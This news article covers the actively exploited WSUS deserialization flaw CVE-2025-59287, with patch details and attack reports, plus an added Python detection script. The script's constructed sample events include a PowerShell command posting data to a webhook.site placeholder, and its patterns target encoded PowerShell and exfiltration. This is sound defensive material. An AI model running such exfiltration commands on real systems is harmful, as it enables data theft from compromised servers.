The Critical WSUS Flaw: A Deserialization RCE Vulnerability Under Active Attack
A critical vulnerability in Windows Server Update Service (WSUS) has been reported and is currently under active attack, posing a significant threat to system security. The vulnerability allows an unauthorized attacker to execute code over a network, compromising the security of systems running WSUS. Microsoft has released urgent updates to address this issue and protect affected customers.
October 25, 2025 - In a significant security update, Microsoft has released urgent patches to address the critical WSUS (Windows Server Update Service) RCE (Remote Code Execution) vulnerability, CVE-2025-59287. This vulnerability is currently under active attack, with researchers MEOW and Markus Wulftange of CODE WHITE GmbH reporting the issue.
The WSUS RCE flaw is a deserialization of untrusted data vulnerability that allows an unauthorized attacker to execute code over a network. The issue stems from insecure BinaryFormatter use, which Microsoft deprecated and removed from .NET 9 in 2024 due to inherent security risks. This makes CVE-2025-59287 particularly concerning as it exploits the same insecure binary deserialization mechanism.
According to the US Cybersecurity and Infrastructure Security Agency (CISA), CVE-2025-59287 has been added to its Known Exploited Vulnerabilities catalog, underscoring the severity of this issue. The Dutch National Cyber Security Centre (NCSC) also confirmed attacks in the wild exploiting the vulnerability on October 24, 2025.
Hawktrace researchers published a Proof-of-Concept (PoC) for this vulnerability, which demonstrates how an attacker can achieve remote code execution with SYSTEM privileges by sending malicious encrypted cookies to the GetCookie() endpoint.
Researchers from Eye Security reported a Base64-encoded .NET payload, observed at 06:55 UTC, that reads the ‘aaaa’ request header and executes its contents via cmd.exe so that the commands do not appear in logs. This was very different from the PoC by Hawktrace and shows that the threat actor had capabilities beyond those of a script kiddie.
Cybersecurity firm Huntress detected attackers probing exposed WSUS endpoints (ports 8530/8531) from 2025-10-23 23:34 UTC, sending crafted POSTs that triggered a deserialization RCE. The exploit spawned cmd.exe and PowerShell, then downloaded a Base64-encoded PowerShell payload that enumerated the system and exfiltrated the collected data to a webhook.site URL.
Huntress says exploitation may be limited because WSUS isn’t often publicly exposed; Microsoft re-released the patch, and the latest updates protect affected customers. The researchers at Huntress also published Indicators of Compromise for this vulnerability.
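As an added example (not code from the article, Huntress or Microsoft), a small process-tree hunt built from the attack chain described above: it flags shells, encoded PowerShell and webhook.site contact that run under the WSUS process tree. The parent images w3wp.exe and wsusservice.exe are assumptions about where WSUS code executes, and the events are constructed Sysmon-style records.

```python
import re

# Assumed WSUS host processes (IIS worker for the web services, WSUS service itself);
# adjust to what local telemetry actually shows for the WSUS role.
WSUS_IMAGES = {"w3wp.exe", "wsusservice.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.IGNORECASE)
EXFIL_RE = re.compile(r"webhook\.site", re.IGNORECASE)

# Constructed process-creation events (pid, ppid, image, command line); not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 812, "image": "wsusservice.exe", "cmdline": "wsusservice.exe"},
    {"pid": 5301, "ppid": 4120, "image": "cmd.exe",
     "cmdline": "cmd.exe /c powershell -nop -enc SQBFAFgA"},
    {"pid": 5322, "ppid": 5301, "image": "powershell.exe",
     "cmdline": "powershell -nop -enc SQBFAFgA"},
    {"pid": 5340, "ppid": 5322, "image": "powershell.exe",
     "cmdline": "powershell -c Invoke-RestMethod https://webhook.site/EXAMPLE-ID -Method Post"},
    # An administrator's interactive console: same tools, but not under WSUS, so benign here.
    {"pid": 6000, "ppid": 2200, "image": "cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 6010, "ppid": 6000, "image": "powershell.exe", "cmdline": "powershell -enc SQBFAFgA"},
]


def wsus_descendants(events):
    """Return the pids whose ancestry (excluding themselves) leads back to a WSUS host process."""
    parent_of = {e["pid"]: e["ppid"] for e in events}
    image_of = {e["pid"]: e["image"].lower() for e in events}
    tainted = set()
    for pid, ppid in parent_of.items():
        cur, seen = ppid, set()
        while cur in image_of and cur not in seen:  # stop at unknown parents or cycles
            if image_of[cur] in WSUS_IMAGES:
                tainted.add(pid)
                break
            seen.add(cur)
            cur = parent_of[cur]
    return tainted


def detect(events):
    """Return (pid, rule) findings for suspicious activity inside the WSUS process tree."""
    tainted = wsus_descendants(events)
    findings = []
    for e in events:
        if e["pid"] not in tainted:
            continue
        image, cmd = e["image"].lower(), e["cmdline"]
        if image in SHELLS:
            findings.append((e["pid"], "shell_under_wsus"))
        if ENCODED_RE.search(cmd):
            findings.append((e["pid"], "encoded_powershell_under_wsus"))
        if EXFIL_RE.search(cmd):
            findings.append((e["pid"], "webhook_site_contact_under_wsus"))
    return findings
```

Running `detect(SAMPLE_EVENTS)` reports only the chain rooted at wsusservice.exe; the administrator's console at pid 6000 is left alone even though it also launches encoded PowerShell.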
Microsoft has released an out-of-band fix for CVE-2025-59287, a critical WSUS RCE flaw (CVSS 9.8) that is under active exploitation. To comprehensively address CVE-2025-59287, Microsoft has released an out-of-band security update for the following supported versions of Windows Server: Windows Server 2012, Windows Server 2012 R2, Windows Server 2016, Windows Server 2019, Windows Server 2022, Windows Server 2022 23H2 Edition (Server Core installation), and Windows Server 2025. A reboot will be required after installing the updates.
The U.S. CISA added the flaw to its Known Exploited Vulnerabilities catalog and warned that attackers were probing exposed WSUS endpoints, sending crafted POSTs that triggered a deserialization RCE. This indicates that this vulnerability is currently being actively exploited by threat actors.
Researchers MEOW and Markus Wulftange reported the vulnerability to Microsoft. “To comprehensively address CVE-2025-59287, Microsoft has released an out of band security update for the following supported versions of Windows Server: Windows Server 2012, Windows Server 2012 R2, Windows Server 2016, Windows Server 2019, Windows Server 2022, Windows Server 2022 23H2 Edition (Server Core installation), and Windows Server 2025. Note that a reboot will be required after you install the updates,” reads the update published by Microsoft.
The flaw is a deserialization of untrusted data in Windows Server Update Service that allows an unauthorized attacker to execute code over a network. Remote, unauthenticated attackers can trigger unsafe deserialization of AuthorizationCookie objects in the GetCookie() endpoint, leading to RCE with SYSTEM privileges. The issue stems from insecure BinaryFormatter use, which Microsoft deprecated and removed from .NET 9 in 2024 due to inherent security risks.
The researchers at Hawktrace stated that the vulnerability allows an unauthenticated attacker to achieve remote code execution with SYSTEM privileges by sending malicious encrypted cookies to the GetCookie() endpoint. “Permanent mitigation requires replacing BinaryFormatter with secure serialization mechanisms, implementing strict type validation, and enforcing proper input sanitization on all cookie data,” they said.